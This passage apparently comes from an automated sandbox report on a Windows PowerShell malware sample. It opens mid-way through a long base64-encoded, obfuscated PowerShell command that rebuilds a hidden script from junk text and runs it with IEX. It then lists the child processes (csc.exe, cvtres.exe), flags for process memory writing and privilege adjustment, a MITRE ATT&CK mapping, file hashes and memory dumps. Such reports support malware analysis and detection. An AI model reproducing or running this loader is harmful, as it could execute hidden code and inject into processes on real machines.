ZABlAG4AQwBoAHIAbwBuAHQAUgBlAHQAcgB0ACAAcwB1AGwAcABoAHYAdgBlAGwAbABlADIAdQB0AG4AawBlACkAUgBlAHYAYQBuADsACgBiAGUAYQB1AHAAfQAKAFMAdABpAGwAZQAiAE0AYQBuAHQAaQBAAAoAVQBjAGgAZQBlACQARgByAGEAbQBtAE8ARgByAGUAZABuAHYAUABvAHIAdABvAGUATABpAHIAawBhAHIARwBsAGEAbgBkADMAdgBlAG4AZQByAD0AVABhAHAAaQBzAFsARgByAGUAbQBzAE8AUgB5AHQAdABlAHYAUgBpAHYAbgBpAGUAUABzAHkAYwBoAHIATABhAHUAcgBpADEARABpAHMAYwBlAF0AbQBhAGQAbwBsADoAUgBpAGcAcwBiADoAUwBwAHIAbwBnAFYAYgBpAGEAdABvAGkAQQBkAG8AcAB0AHIAUAByAGUAYwBvAHQAUgBlAG4AbwB2AHUAVABuAGQAYgBhAGEAVgBhAG4AZABiAGwARwBlAG4AcwBrAEEAVQBnAHUAbgBzAGwAUgByAGcAcwBtAGwAQgBlAHMAdAB5AG8AUwBpAG4AdQBhAGMAQgBlAGMAbwBtACgARABvAGcAbQBlADAAUwBrAHUAbQBtACwAUgBlAGcAaQBzADEATgBvAG4AYwBoADAAVwBhAHUAYwBoADQATQBhAGcAaQBjADgAUABlAHQAcgBvADUAVABpAGwAbABpADcAUgBpAG4AZwByADYARQBuAHMAaQBkACwAQQBkAG8AcgBhADEAQgBhAHMAcgBlADIAUgBzAG8AbgBuADIAQgB1AG4AZABmADgASgBlAHIAZQBtADgAUwB0AHkAbABvACwATABuAGkAbgBkADYAdQB0AGkAcwBtADQAVgBhAGwAdQB0ACkACgBQAGUAbgB0AGEAJABCAGUAawBsAGEAVABPAG4AZQBzAHQAZQBFAHgAcABsAG8AcwBPAGIAagBlAGsAdABFAHMAYwBvAGMAYQBGAG8AcgBkAGUAYwBGAG8AcgBzAGEAeQBCAGkAdAB0AGUAcABEAGUAcwB0AGkAbwBJAG0AcABsAGUAZABCAHIAZQBkAGIAPQBXAGkAbgBkAGkAKABQAHIAbwB2AG8ARwBBAHMAdAByAG8AZQBOAG8AbgBpAHIAdABEAHUAYgBsAGUALQBCAGUAcwBsAGEASQBCAGUAcAByAGEAdABIAGUAbQBtAGUAZQBaAGEAbgB6AGkAbQBFAG4AZwBhAG4AUABIAGEAbQBhAHQAcgBMAHkAbQBwAGgAbwBSAGgAZQBpAG4AcABmAG8AcgBnAHIAZQBIAHkAcABlAHIAcgBUAHIAYQB2AGUAdABTAHQAYQBrAGwAeQBPAHAAdABhAGcAIABSAGEAYQBzAHkALQBTAGoAbABzAHMAUABXAGgAaQB0AGUAYQBPAHAAZwBhAHYAdABPAHQAbwBsAG8AaABTAGEAawBrAGEAIABFAHgAcABpAGEAIgBBAHAAcgBpAG8ASABBAGsAawB2AGkASwBFAGwAbABlAHIAQwBTAGsAcgBpAHYAVQBGAG8AcgBlAG0AOgBWAG8AbQBtAGUAXABVAG4AYwBlAGEAUwBQAGwAdQByAGEAbwBBAGQAZQBuAG8AZgBMAG8AdwBlAHIAdABSAGUAagBuAGUAdwBDAGUAbgB0AHIAYQBGAGUAcgBsAHkAcgBTAHQAYQBkAHMAZQBGAHIAdQBnAHQAXABGAHIAcwB0AGUARABUAGUAbgBkAHIAZABTAHkAcwB0AGUAcwBLAGwAYQBwAGgAbwBUAGEAawBuAGkAZgBVAGQAZABhAG4AZgBQAGUAbgBkAGEAZQBNAGUAcwBvAGcAcgBTAHAAeQB0AGsAIgBzAHQAbwByAHQAKQBVAG4AZQBuAGcALgBNAGEAbABhAGMAVABFAGMAdQB2AGUAaAB2AGkAegBhAHIAaQBEAHkAcgBlAGgAcgBLAGEAYgB5AHMAZABPAHYAZQByAHMAbABNAGEAdABlAG0AaQBMAGkAcwB0AGUAbgAKAE4AcgBlAG4AZAAkAFIAaQBnAHMAZABVAE0AaQBuAHUAdABuAGMAcgBhAHcAZABhAEEAZgBzAGwAYQBiAEoAYQBlAHYAbgBqAFAAcgBqAHMAZQB1AEEAawB0AGkAZQByAEoAbwByAGQAZgAgAEMAbwBuAHQAZQA9AEEAZgBnAGEAbgAgAFMAYwBpAHMAcwBbAEEAbAB2AG8AcgBTAFIAZQBuAGUAdwB5AFkAbgBnAHMAdABzAEUAdAB0AGUAcgB0AEsAbABpAHAAcABlAEwAZwBlAGEAdABtAFQAYQBhAHIAZQAuAEYAbwByAGsAbwBDAEYAbwByAGgAYQBvAEIAYQBsAHQAegBuAEQAZQBoAHkAZAB2AFIAbwBkAGwAcwBlAEMAcgBvAHQAYQByAFMAdQByAG0AdQB0AEYAZQBqAGwAawBdAFUAbgBkAGUAcgA6AGYAbwByAG0AYQA6AGYAcgBpAG0AaQBGAFAAcwB5AGMAaAByAEwAYQByAHkAbgBvAFMAbwBmAGYAaQBtAEEAbgB0AGkAcQBCAFMAbABhAGcAdABhAFIAZQBrAG8AcgBzAFYAYQBjAGEAbgBlAFMAbwBmAGEAZwA2AFAAdQBuAGcAZQA0AEIAZQByAGUAZABTAEcAdQBsAHIAYQB0AHMAdABvAHIAawByAFMAawBpAHAAawBpAFMAdAB1AHQAdABuAEQAZQBjAGUAbgBnAGEAdQB0AG8AcAAoAFMAcABpAHIAYQAkAE8AbwBsAG8AZwBUAEIAeQBnAGIAYQBlAFMAdAB5AHIAdABzAHAAaABvAHQAbwB0AE8AcABrAGwAYgBhAFYAcwBrAGUAZABjAE4AeQBtAGEAYQB5AFYAYQBhAGQAcwBwAFQAcgBpAG4AZABvAFMAaQBtAHAAbABkAEQAZQBwAGwAbwApAAoAVQBwAHcAYQByAFsAUgBpAGQAZABlAFMAQgBsAGEAYwBrAHkATgBhAHQAdQByAHMAQgB1AHMAdABoAHQARABpAHAAcwBvAGUATgBlAHQAdABlAG0AVgB1AHIAZABlAC4AQgBvAG4AZABlAFIAZwBsAGkAcwBzAHUAVAByAG8AYwBoAG4ASwBhAGEAbAByAHQAQgBhAG4AagBvAGkAUgBlAGYAbwByAG0ASQBuAGQAdQBjAGUAVABvAHUAcgBpAC4ARgBvAHIAZwBlAEkAVQBuAGQAZQByAG4AUwB0AHIAYQBuAHQAawBsAGkAbgBnAGUAagB1AHYAZQBsAHIAQgBlAGcAdQBuAG8AUgBlAHYAYQBsAHAATABlAHQAaABlAFMASQBuAGQAawBhAGUAVAByAGEAdgBlAHIAVABvAGwAZABrAHYAcgBlAHAAZQByAGkAbwByAGQAawBuAGMAUwBhAHQAYwBoAGUAUwBwAGkAbAB2AHMASwBsAGkAbQBhAC4ATgBvAHAAcgBlAE0ASwByAHkAZABzAGEATABpAGcAZQBmAHIATQBhAHMAcwBlAHMASABhAGEAbgBkAGgAQQByAG0AYQBnAGEAYQBuAG8AZABpAGwAYwBvAHAAeQByAF0AUAByAGUAcgBlADoASABvAHYAbQBvADoATABzAGUAaABhAEMAQgBlAHMAdwBhAG8AVQBuAGgAZQBsAHAASQBsAHMAZQBiAHkAZgBsAG8AcwBzACgARgBqAGUAbgBkACQAQQBpAHoAbwBhAFUAUgB2AHIAZABpAG4ASABhAG4AZABnAGEAYQBkAHYAbwBrAGIAVQBsAHQAcgBhAGoASwByAGEAcABzAHUAVgBlAHIAdABlAHIAbABvAHkAYQBsACwAVgBlAGoAZgBhACAAUABsAHMAZQBkADAAYwBvAG0AbQB1ACwAUwB0AGEAbABkACAAQQBsAGwAbwB0ACAAUABpAG4AZABlACQASQBuAG8AcgBkAE8ASQBtAGEAbQBhAHYASQBuAGYAbwByAGUAUwBtAGEAYQBkAHIAVQBkAHMAawBpADMAUgB1AHMAcwBpACwASQBuAGYAZQByACAATQBhAGwAdgBpACQAcABsAGkAZwB0AFUAUgBlAGEAawB0AG4AUwB0AHkAcgBlAGEAVABhAHAAZQB0AGIASABhAHUAcwBmAGoARgBvAHIAbABkAHUAVQBuAGkAbgBmAHIARgBvAHIAdABqAC4AUwBrAGkAbQBtAGMARABlAHQAYQBpAG8AVwBlAGIAbABzAHUASwBvAG0AcABsAG4ARgB1AG0AZQB3AHQATgB2AG4AZQBuACkAQwBvAHQAcwBlADsACgBTAG0AYQBhAGIAWwBJAG4AdQByAG4ATwBWAGEAZwB0AHAAdgBDAGgAYQBpAG4AZQBVAHIAYQBuAGIAcgBGAG8AcgBlAG4AMQBQAGEAYwBlAGQAXQBBAHIAaQBuAGUAOgBTAGsAdgBhAHQAOgBiAGkAcwBtAGEARQBJAGQAZQBvAGcAbgBzAGUAcgBhAGkAdQBwAGwAYQBuAG8AbQBGAG8AcgBtAGkAUwBSAGUAYQBzAHMAeQBVAG4AZAB1AGIAcwBHAHIAZABhAGcAdABVAG4AdABhAHIAZQBCAHIAaQBrAHYAbQBDAHkAcwB0AG8ATABQAHUAbgBrAGUAbwBjAGkAYwBhAHQAYwBDAGgAbwByAGkAYQBPAGIAbABpAHEAbABTAGMAaABhAHQAZQBBAHAAcABlAGEAcwBDAG8AbgBjAGkAQQBQAGgAbwByAHIAKABQAG8AaQBuAHQAJABHAGUAbQBtAG8ATwBUAGUAdgBhAG4AdgBKAG8AcgBkAGIAZQBBAGkAcgB0AGkAcgB0AGUAcgBuAGEAMwBMAGUAZABzAGEALABpAG4AZQBsAGEAIABTAHQAZQBkAG0AMABGAHUAZwB0AGQAKQBQAHIAaQBtAHQAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABHAGEAcwBsAGkAZwBoAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAQgBlAG0AdQBzAGsAIAA9ACAAJABCAGUAbQB1AHMAawAgACsAIAAkAEcAYQBzAGwAaQBnAGgALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABHAGEAcwBsAGkAZwBoAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEIAZQBtAHUAcwBrACAAPQAgACQAQgBlAG0AdQBzAGsAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABCAGUAbQB1AHMAawANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:852
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vquizs6d.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE67A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE66A.tmp"
      4⤵
      PID:2044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE67A.tmp

Filesize
1KB

MD5
16526090d6de9db7efd7b8438d9016f0

SHA1
c93744de6e17a9d2a1b5b96b6f1a325dbc2c27c8

SHA256
7e0134e2a1392abcc312f190310613092b06387a006da07b2d6be32ad34bc6f8

SHA512
3a19991a9917a5ef08d66f70d4b7044b10331488d97e0084a5bb04f2535476becce3ce15439a26ef9e4d9a6bc75d8058979d3ec0e6346ea457b32280fd23bbc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\vquizs6d.dll

Filesize
4KB

MD5
36624ee648fc0c5592119f6bf68bec78

SHA1
b1b526ba467b45c3d7e506adfc1748ad2b3334a7

SHA256
05c7bac074e20c561dfd66024499a95bae0622c56d43eafb211cdc9debbf9efe

SHA512
700e937ddfc57bd8b36d544787817e4b9f1346ece3916a73a660163b54cb36f01e937a0d1593be31c809f92780d0c6716d7b96fdde6023faf71b71b5ddd7ddcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\vquizs6d.pdb

Filesize
7KB

MD5
062ab88e2a71127afe1420b2c6bdecbd

SHA1
6650e7f2790dbf285be0d7a01dbf6fa307a7de6d

SHA256
5e955e8173a69c2dc53149743963941c2fca515fd04b0451395099b46fba85b1

SHA512
73d5ab5ac9115e53614d3b386c12d8b63490c1c2bb072a05dac1f254fdf31e135d4b62dca26f6e24862019cdcfe28ac4b9aa838ed76d49d3e7ad4084b18e3d09

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE66A.tmp

Filesize
652B

MD5
18be7ef63c9d1bc11b0f5343d0a56dfa

SHA1
75def78fcf4ab2bafd564db1335bb0f44402cc42

SHA256
c0784c506724ca6f48c5c6074c11d56fc2f1026a980da6c78df17d67e61492d0

SHA512
e5af603c375bf1b93c52fc1d98177ece3367d62d72e2b58b6c9a9e8dbbb1531387c63d804c8e9991a846afc3eda883708031968ef9eb7f27962d00a145f848b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vquizs6d.0.cs

Filesize
910B

MD5
8bc6902c9554f8e17fdb227670053f69

SHA1
36bf150cb69b52688beec1483a5b0f32f7709c46

SHA256
73d4b18caad7ad9e4bd8957be138ee440008c3a27859a025136525102e9f8114

SHA512
9f8da240977b055655e7f7ed2dbd11a28bffde0799761c2e51d3473f0ee0c93510ee11e68d130b0b5b9341ec7ef0a3f62b75eeb76891491c7fb56d0b6ba37027

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vquizs6d.cmdline

Filesize
309B

MD5
326ec7d01f2a6869e7ce177621430996

SHA1
50fdcfa8de6784a03b3ab656a822634870876a45

SHA256
74045333b8672e5f7527bc042078f90519de647ddd7c8f9338526b4230cd4062

SHA512
2aa15ff839980d726790d0001c778f6722eb542198d11d2ab3ec055c0e02454d367b5a3b773f1b1f3032d035ea38a96dfe94483ce90d1eefe81fa5d94079451e

Download Submit
memory/852-57-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/852-56-0x00000000754E1000-0x00000000754E3000-memory.dmp

Filesize
8KB

Download
memory/852-66-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/852-67-0x0000000005190000-0x0000000005290000-memory.dmp

Filesize
1024KB

Download
memory/1976-54-0x000007FEFB761000-0x000007FEFB763000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing